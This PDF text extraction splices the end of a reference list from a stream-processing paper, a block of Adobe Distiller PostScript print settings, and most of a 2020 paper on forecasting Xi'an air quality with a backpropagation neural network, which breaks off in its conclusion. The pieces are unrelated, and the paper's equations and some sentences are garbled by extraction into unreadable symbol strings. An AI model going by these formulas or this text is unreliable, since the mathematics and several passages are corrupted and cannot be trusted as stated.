10.1109/tsc.2015.2428246. Kulkarni S, Bhagat N, Fu M, Kedigehalli V, Kellogg C, Mittal S, Patel JM, Ramasamy K, Taneja S. 2015. Twitter heron: stream processing at scale. In: International Conference on Management of Data (SIGMOD), Melbourne, Victoria, Australia. New York: ACM, 239–250. Lim H, Han Y, Babu S. 2013. How to fit when no one size fits. In: 6th Biennial Conference on Innovative Data Systems Research (CIDR ’13), Asilomar, CA, USA, 35. Lohrmann B, Janacik P, Kao O. 2015. Elastic stream processing with latency guarantees. In: 35th International Conference on Distributed Computing Systems (ICDCS), Columbus, OH, USA. Piscataway: IEEE, 399–410. McAfee A, Brynjolfsson E, Davenport TH, Patil D, Barton D. 2012. Big data: management revolution. Harvard Business Review 90(10):61–67. Nakajima S. 1988. Introduction to TPM: Total Productive Maintenance. New York: Productivity Press, Inc. Satzger B, Hummer W, Leitner P, Dustdar S. 2011. Esc: towards an elastic stream computing platform for the cloud. In: International Conference on Cloud Computing (CLOUD), Washington, DC, USA. Piscataway, 348–355. Schneider S, Andrade H, Gedik B, Biem A, Wu K-L. 2009. Elastic scaling of data parallel operators in stream processing. In: International Symposium on Parallel & Distributed Processing (IPDPS), Rome, Italy. Piscataway, 1–12. Schulte S, Hoenisch P, Hochreiner C, Dustdar S, Klusch M, Schuller D. 2014. Towards process support for cloud manufacturing. In: 18th International Enterprise Distributed Object Computing Conference (EDOC), Ulm, Germany. Piscataway: IEEE, 142–149. Setty V, Vitenberg R, Kreitz G, Urdaneta G, Van Steen M. 2014. Cost-effective resource allocation for deploying pub/sub on cloud. In: 34th International Conference on Distributed Computing Systems (ICDCS), Madrid, Spain. Piscataway: IEEE, 555–566. Tatbul N, Çetintemel U, Zdonik S. 2007. Staying fit: efficient load shedding techniques for distributed stream processing. In: Proceedings of the 33rd International Conference on Very Large Data Bases, September 23–27, University of Vienna, Austria, 159–170. Toshniwal A, Taneja S, Shukla A, Ramasamy K, Patel JM, Kulkarni S, Jackson J, Gade K, Fu M, Donham J, Bhagat N, Mittal S, Ryaboy D. 2014. Storm@twitter. In: International Conference on Management of Data (SIGMOD), Snowbird, UT, USA. New York: ACM, 147–156. Vavilapalli VK, Murthy AC, Douglas C, Agarwal S, Konar M, Evans R, Graves T, Lowe J, Shah H, Seth S, Saha B, Curino C, O’Malley O, Radia S, Reed B, Baldeschwieler E. 2013. Apache hadoop yarn: yet another resource negotiator. In: Proceedings of the 4th Annual Symposium on Cloud Computing. Santa Clara, CA, USA. ACM, 5. Xu J, Chen Z, Tang J, Su S. 2014. T-storm: traffic-aware online scheduling in storm. In: 34th International Conference on Distributed Computing Systems (ICDCS), Madrid, Spain. Washington, D.C.: IEEE, 535–544. Xu L, Peng B, Gupta I. 2016. Stela: enabling stream processing systems to scale-in and scale-out on-demand. In: International Conference on Cloud Engineering (IC2E), Berlin, Germany. Pisacataway: IEEE. Zaharia M, Chowdhury M, Franklin MJ, Shenker S, Stoica I. 2010. Spark: cluster computing with working sets. In: HotCloud, Boston, MA, USA, Vol. 10, 10–17. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 36/36 http://dx.doi.org/10.1109/tsc.2015.2428246 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Cost-efficient enactment of stream processing topologies Introduction Motivation Problem Definition Optimization Approach Evaluation Results and Discussion Related Work Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_tkqxtanwfvbirnxysm5b7syhnq ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-028 57 Analysis and Forecast of Urban Air Quality Based on BP Neural Network Wenjing Wang School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 1908644938@qq.com Shengquan Yang School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: xaitysq@163.com Abstract—The rapid economic development has led to the declining quality of the atmospheric environment. At present, my country is facing a very serious problem of atmospheric environmental pollution. Accurate prediction of air quality plays a vital role in the realization of air pollution control by environmental protection departments. Based on the historical air pollution concentration data, this paper establishes a BP neural network model to learn the statistical law of air pollutant values to realize the prediction of air quality in the future. Through the analysis of the target of air quality prediction, the design of an air quality prediction method based on BP neural network is designed. This method includes four stages: air pollutant concentration data collection, data processing, air quality index calculation, and prediction network construction. The experimental results show that the air quality prediction method based on BP neural network designed and implemented in this paper, combined with the developed air quality prediction system, can effectively predict the recent changes in air quality and various air pollutant concentrations. By collecting the concentration data of air pollutants and learning the changes of air pollutants to achieve air quality prediction, it provides a quantitative reference for government environmental protection departments to achieve air pollution control. Keywords-AQI; Air quality Prediction; BP Neural Network I. INTRODUCTION Air quality prediction, as the name suggests, is based on the historical emission concentration values of various pollutant items in the air to predict the concentration values of various pollutants in the air pollution in the future and the air environment quality[1]. As China's rapid economic development has led to serious atmospheric environmental pollution problems, the state and the public have paid more and more attention to the treatment and prevention of air pollution. The government environmental protection department hopes to keep abreast of the details of local air pollution and the recent changes in air pollution. The public also hopes to be able to understand the impact of air quality around them on their health in time. In recent years, the state has increased its plans for ecological environmental protection, and the plan clearly clarified that atmospheric pollution control is one of the key contents. The environmental protection departments of local governments strengthen air pollution control work, hoping to understand the changes in air quality in a timely manner by establishing an air quality prediction model. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 58 Xu Dahai proposed an atmospheric advection diffusion box model in 1999, in which the concept of the air pollution potential index was clearly determined, which effectively improved the accuracy of potential prediction on the basis of existing research [2]. In 2002, Liu Shi proposed a statistical model for potential prediction based on the air pollution of Changchun City. The model achieved a certain prediction effect [3]. But generally speaking, the accuracy of the potential prediction is very low, so it needs to be used together with other prediction methods, and cannot be used alone. The chemical model for high resolution of the troposphere in the atmosphere established by Lei Xiaoen is a typical numerical prediction model. Using this numerical prediction model can realize the prediction of the changing process of air pollutants in the atmosphere [4]. Due to its own characteristics, numerical prediction requires detailed geographic, meteorological, and pollution sources to realize the air quality prediction process. Collecting these data in actual situations requires huge costs and is difficult to obtain. In addition, numerical prediction models require high the amount of hardware computing resources is used to calculate the change trend of air pollution at high speed. The calculation complexity is high and it takes a long time, so the current numerical prediction model is not popular in small and medium-sized cities. Taiwan’s Pai uses a gray model to achieve air quality prediction. The final actual results show that this method can achieve good results in achieving air quality prediction [5]. The time series analysis method and multiple regression model method in the statistical prediction method simplifies many change factors that affect air quality in the process of achieving air quality prediction, and makes many assumptions in the training process to achieve prediction, and finally achieves air quality the accuracy of the prediction needs to be further improved. The neural network has a good approximation effect in air quality prediction. It can continuously update the newly acquired air pollutant information to the neural network, update the prediction model in time, and improve the prediction accuracy. The neural network has a strong performance in air quality prediction. Dynamic adaptability and fault tolerance. In his research, Wang Jian pointed out that the BP neural network has advantages that other methods do not have in problems such as air quality prediction [6]. This paper uses air quality prediction based on BP neural network, and builds a neural network model to achieve air quality prediction, providing government environmental protection departments with air pollution trends. II. AIR QUALITY RELATED FACTORS AQI is the abbreviation of Air Quality Index. AQI does not refer to the value of a specific pollutant project, but reduces the concentration of the six air pollutant projects S02, N02, O3, CO, PM2.5 and PM10 to a single concept. Sex index form, used to represent the overall situation of air quality [7]. According to the size of the AQI value, the air pollution situation can be divided into different levels, and different air quality levels indicate the overall air quality in the local area over a period of time. The goal of this research is to make a short-term prediction of AQI in Xi'an, select the six main pollutant concentrations of AQI as features, build an air quality prediction model, improve the prediction accuracy and efficiency of the air quality prediction model, and provide environmental monitoring and governance Provide accurate air quality information. In terms of data set acquisition, the air quality pollutant concentration data comes from the weather post website. Using web crawler technology to crawl the data of the website’s air quality data module, the data from October 2013 to December 2019 can be obtained. Relevant feature data, after preprocessing the feature data to form an experimental data set. The original data does not necessarily meet the needs of the prediction model. The original data often needs to be processed before the training model is constructed, so International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 59 that the collected original data meets the needs of the model. This paper studies the air quality prediction method, and the construction of the air quality prediction model mainly needs to consider the lack of data Processing, data outlier processing, and data normalization processing. In this paper, the mean value filling method is used to deal with missing values. The mean value filling method is to replace the missing values with the average value of historical data. This method is simple to implement and suitable for models with high accuracy requirements. Data anomaly refers to an unreasonable value in a data set. For example, taking air pollutant concentration data as an example, if the actually collected concentration data value is a negative number, the value is determined to be an abnormal value. In the research method of this paper, the outliers are regarded as missing values, and the outliers are dealt with in the way of missing values. In order to avoid the overflow of the weight of the neural network is too large or too small, to eliminate the possible impact of different variables of the input vector due to different dimensions or too large difference in value, the input vector of the neural network needs to be processed. Normalized data processing is performed on the collected original data set, so that each index of each element data of the vector is at the same order of magnitude, which is suitable for training model for learning. This article uses the Z-score standardized method, the calculation method is: δ μ*   x x (1) Among them, is the mean value of all sample data, and is the standard deviation of all sample data. III. AIR QUALITY PREDICTION MODEL A. BP neural network BP neural network is an error back propagation neural network. Rumerlhar proposed an error back propagation algorithm in the study of forward neural network, referred to as BP neural network algorithm. The network of each layer of the BP neural contains many neuron nodes. There is no connection between the neurons in the layer, and all the neuron nodes between adjacent layers are fully connected [8]. The input layer is used to accept network input information. Each neuron will generate the corresponding link weight according to the input information of the obtained network. The function of the hidden layer in the BP neural network is information detection. According to Tambe’s global approximation theory, even if a neural network contains only one hidden layer, as long as there are enough neuron nodes and the appropriate connection function and weight are selected, it can be arbitrary. Approximate the input and output vector of a measurable function [9]. The BP neural network can obtain information and continuously update it to the network, and constantly adjust its structure to meet the characteristics of the model, and has strong self-adaptability and fault tolerance. The BP neural network learning process is that after receiving the initial input and the given target output, the information forward propagation learning process is performed. This process first calculates and calculates each neural unit of the input layer and each neural unit of the hidden layer. Obtain the output of each neural unit of the hidden layer, and then use the same method to calculate the output of each neural unit of the output layer to determine the error between the actual output of the output layer and the target output. If the error value is within the user's acceptable range, then Fix the weight and threshold, and end the training, otherwise it enters the second stage. The second stage is the error signal back-propagation stage. In this stage, the partial derivative of the error is first calculated μ δ International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 60 using the output of the output layer, and then the partial derivative obtained by calculation is weighted and summed with the previous hidden layer. Input layer, and finally use the partial derivative calculated by each neural unit to update the weight [10]. Repeat these two stages until the error between the actual output and the target output is reduced to an acceptable range. Figure 1 is the learning flowchart of the BP neural network: Begin Provide initial input and target input Calculate the output of each unit of the hidden layer Calculate the output of each unit in the output layer Calculate the error between the actual output and the target value Whether the error is within the allowable range Fixed weights and thresholds End Update the connection weight of each layer Adjust the connection weight of the input layer to the hidden layer and the output threshold of each unit of the hidden layer Calculate hidden layer correction error Calculate the output layer correction error Yes No Figure 1. BP neural network learning process From the above, the algorithm flow of BP neural network can be divided into two processes, as follows: 1) Forward propagation sub-process It is now defined that the input value of the input layer node is i X , the weight value between the input layer and the hidden layer node is ih W ; the threshold value of the hidden layer node is h b and the value between the hidden layer and output layer node is ho W ; output The threshold of the layer node is o b , the network activation function is f , the output value of the output layer node is o yo , and the expected output value is o y . The forward propagation process of the BP neural network is to solve the output layer output value i X from the input layer input value o yo . Specific steps are as follows: a) Calculate the input and output values of the hidden layer Hidden layer input value:    m i hiihh bXW 1 hi （h=1,2,...,n） (2) Hidden layer output value: )(h hh hifo  （h=1,2,...,n） (3) b) Calculate the input value and output value of the output layer Input value of output layer:    k o ohhoo bhoW 1 yi （o=1,2,...,k） (4) Output value of output layer: )( oo yifyo  （o=1,2,...,k） (5) 2) Back propagation sub-process International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 61 The back propagation process of BP neural network is based on Widrow-Hoff learning rules. The error function is as follows:    k o o yoyWE 1 2 0 )( 2 1 b），（ (6) The main goal of the BP neural network algorithm is to iteratively modify the weights and thresholds between layers so as to minimize the value of the error function. According to the Widrow-Hoff learning rule, along the direction of the steepest descent of the sum of squared errors, the weights and thresholds are constantly adjusted. According to the gradient descent method, the amount of weight change is proportional to the gradient of the error function at the current position, as shown in equation (6)： W WE W    )b,( 1  (7) Also for thresholds are: b WE    )b,( b 2  (8) In the formula: 1  , 2  is the learning speed, and its value range is (0,1). The specific steps of the BP neural network back propagation process are as follows: a) Calculate the weight between the hidden layer and the output layer and adjust the threshold of the output layer For ho W , according to formula (6), we can get: ho o oho W yi yi E W bWE W         11ho ),(  (9) From formulas (3), (4), and (5), we can get: h ho o ho W   y i (10) o ' 0 )()( yi    oo o yifyoy E (11) From formulas (8), (9), (10), we can get: hhoW o1ho  (12) Similarly, we can get: o2b  o (13) b) Calculate the weight between the input layer and the hidden layer and the adjustment amount of the hidden layer threshold For ih W , according to equation (6): ih h hih W hi hi E W bWE W         11ih ),(  (14) Since h hi affects all output layers, there are:          k i h o oh hi yi yi EE 1hi (15) From formulas (2) and (3), we can get: International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 62 )( yi ' hho h o hifW hi    (16) From formula (10)、(15)、(16), we can get:      k o hhooh o Whif E 1 ' )( hi  (17) From equations (13), (14) and (17), we can get: ih h W W    hi h1ih  (18) Similarly, we can get: h2hb  (19) c) Update the weights and thresholds of the BP neural network From (12), (13), the updated weight and output layer threshold between the hidden layer and the output layer are: ho N ho N hoWW  1 1 ho   (20) o N o N o b  2 1 b   (21) From equations (19) and (20), the updated weights and hidden layer thresholds between the input layer and the hidden layer can be obtained: ih h h N ih N W hi WW      1 1 ih (22) h N h N h b  2 1 b   (23) B. Design of air quality prediction model The core algorithm used in this paper is the BP neural network algorithm. According to the characteristics of the BP neural network, this topic needs to determine the number of neuron nodes in each layer of the network, and select the network activation function and initial parameters. The determination of the number of input layer nodes of the BP neural network is very important. Too many or too few selections will affect the prediction accuracy of the model. Therefore, the number of input layer nodes should be determined according to the actual application needs. This subject designs the input layer and output layer of the network based on the collected data. The number of input layer nodes is 6, which are the data of the concentration values of six pollutants such as PM2.5, PM10, SO2, NO2, C0, and O3 in a day. The number of nodes in the output layer is one, that is, the AQI value of the next day. The structure of the BP neural network in this subject is divided into three layers, with only one hidden layer. There is no theoretical guidance for determining the number of hidden layer nodes, and it is usually based on specific practical experience. The empirical formula for selecting the number of hidden layers is:  qnp (24) In the formula, n and q represent the number of neurons in the input layer and output layer, respectively, generally take an integer between 1-10. The number of hidden layer nodes in this subject is first determined as 7. The network activation function is an important factor that affects the performance of the BP neural network algorithm, which makes the network have nonlinear processing capabilities. There are three activation functions of BP neural network: log-sigmiod function, tanh function and ReLU function. According to the characteristics of the research data and the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 63 characteristics of the three activation functions, in this paper, the hidden layer of the BP network selects the log-sigmiod function as the activation function, and the output layer selects the ReLU function as the activation function. Since the sample data is normalized, the value interval between the initial weight and the threshold is between [-1, 1], and they should be a set of random numbers that are not exactly equal. Figure 2. Log-sigmiod function Figure 3. ReLU function IV. EXPERIMENT The experimental simulation platform used in this article is the Python programming language. The air data object used in the experiment is the air quality data of Xi'an from October 2013 to December 2019. All the experimental data are sorted in a continuous time series. Take the data for 30 consecutive days as the test data set, and the other as the training data set. For the evaluation of the advantages and disadvantages of the model, this paper uses the average error and the root mean square error to evaluate. The calculation formulas are shown in equations (25) and (26):     n i i ii y yy n MAPE 1 * || 1 (25)    n i ii yyRMSE 1 2* )( n 1 (26) Experimental results show that the prediction model established in this paper has high accuracy and high efficiency for PM2.5 concentration prediction. The simulation prediction results are shown in Figure 4 the measured values and predicted values of the first 6 groups are compared to obtain Table 1. TABLE I. COMPARISON BETWEEN MEASURED AND PREDICTED AQI AQI prediction PM2.5 PM 10 So2 No2 Co O3 45 56.21 27 40 4 24 0.71 75 49 60.51 23 47 6 36 0.63 84 55 64.30 33 57 6 35 0.62 84 57 68.54 39 60 5 40 0.71 56 68 80.22 40 67 5 39 0.77 85 61 74.35 33 69 6 47 0.70 71 Figure 4. Comparison of sample prediction results with real values The experimental results show that, after analyzing the prediction results, it is concluded that under the experimental conditions given in this paper, the average error of the experimental results is 0.074 and the root mean square error is 13.41. As can be seen from Figure 4-1 and Table 4-1, the BP neural network established in this paper has lower prediction error when the air quality fluctuates greatly. 0 200 400 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 AQI measured AQI prediction International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 64 This research also has some shortcomings at present. It only considers the relevant factors that can be quantitatively analyzed, and does not take into account some unexpected emergencies. For example, natural disasters, human factors, etc. Due to the unpredictable and unquantifiable characteristics of these factors, they have not been considered in the article. In the future research work, we hope to analyze these factors. V. CONCLUSION This article aims at the current situation of severe air pollution problems facing China. The traditional air pollutant online monitoring system 